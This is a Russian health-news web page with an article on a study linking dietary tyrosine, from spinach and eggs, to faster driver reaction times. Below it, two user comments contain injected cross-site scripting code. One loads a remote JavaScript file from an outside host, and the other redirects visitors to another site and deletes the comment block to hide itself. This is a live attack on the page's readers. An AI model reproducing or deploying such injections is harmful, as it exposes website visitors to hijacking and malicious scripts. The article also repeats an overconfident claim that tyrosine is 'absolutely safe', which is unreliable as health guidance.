Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Не хотите задавить ребенк...  >>  Не хотите задавить ребенка – ешьте шпинат с яйцами!
 
Обратная связь
 

Не хотите задавить ребенка – ешьте шпинат с яйцами!

Размер шрифта
20 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые обнаружили, что шпинат может ускорять реакцию водителя благодаря наличию в его составе одной из незаменимых аминокислот.

Не хотите задавить ребенка - ешьте шпинат с яйцами!

Немецкий философ Людвиг Фейербах однажды сказал: «Ты есть то, что ты ешь». Вещества, которые мы потребляем с пищей, могут прямо и опосредованно влиять на наше поведение и восприятие окружающей действительности. Ученые из Лейденского и Амстердамского университетов (оба – Нидерланды) впервые в истории провели исследование, в котором изучалось влияние тирозина на степень человеческой реакции при бешеных скоростях. Тирозин – это аминокислота (один из кирпичиков, из которых состоят наши белки). Это вещество входит в состав многих продуктов питания, таких как шпинат, яйца, творог, соя и другие. Дефицит этой аминокислоты приводит с снижению концентрации дофамина в мозге, что может стать причиной депрессии и апатии.

В ходе исследования ученые воспроизводили ситуацию, в которой добровольцам необходимо было прекратить выполняемое действие тотчас в тот самый момент, когда следовал сигнал. Скажем, один из экспериментальных тестов выглядел следующим образом: испытуемые внимательно смотрят на экран компьютера, и как только на нем появляется зеленая стрелка, им нужно немедленно нажать определенную клавишу. Стоит подчеркнуть: скорость была не единственным компонентом задачи – важно было нажать кнопку не только быстро, но и правильно.

Эксперимент был разделен на две серии тестов: перед первой испытуемые должны были выпить стакан апельсинового сока с тирозином, а перед второй – с плацебо (вещество-пустышка без действующего эффекта).

Первая серия ознаменовалась значительно лучшими результатами исполнения тестов.

Данный эффект представляется крайне многообещающим в контексте дорожного движения. Скажем, если впереди идущая машина начинает внезапно тормозить, только быстрая реакция может спасти вас от неминуемого столкновения. Однако это отнюдь не единственная потенциальная сфера приложения данной научной работы. «Продукты питания и биологически активные добавки с тирозином – здоровый и недорогой способ улучшить состояние своего интеллекта», – рассказывает доктор Лоренца Кольцато, один из авторов исследования. «Этот способ более предпочтителен, чем применение модафинила и других препаратов, повышающих активность мозга; по одной простой причине: тирозин абсолютно безопасен и не требует рецепта врача».

Поэтому ешьте шпинат, чтобы иметь реакцию, как у кобры.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:50

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Худшая еда для беременной   Что есть? 10 продуктов, которые не дадут вам заболеть раком   Всемирная неделя первичного иммунодефицита начинается в Москве!   Беременность: как обезопасить себя и будущего малыша от вирусов  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Вы задохнетесь у себя дома, если не сделаете этого!
9 суперлетних продуктов
Можно ли пережить беременность без рвоты?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.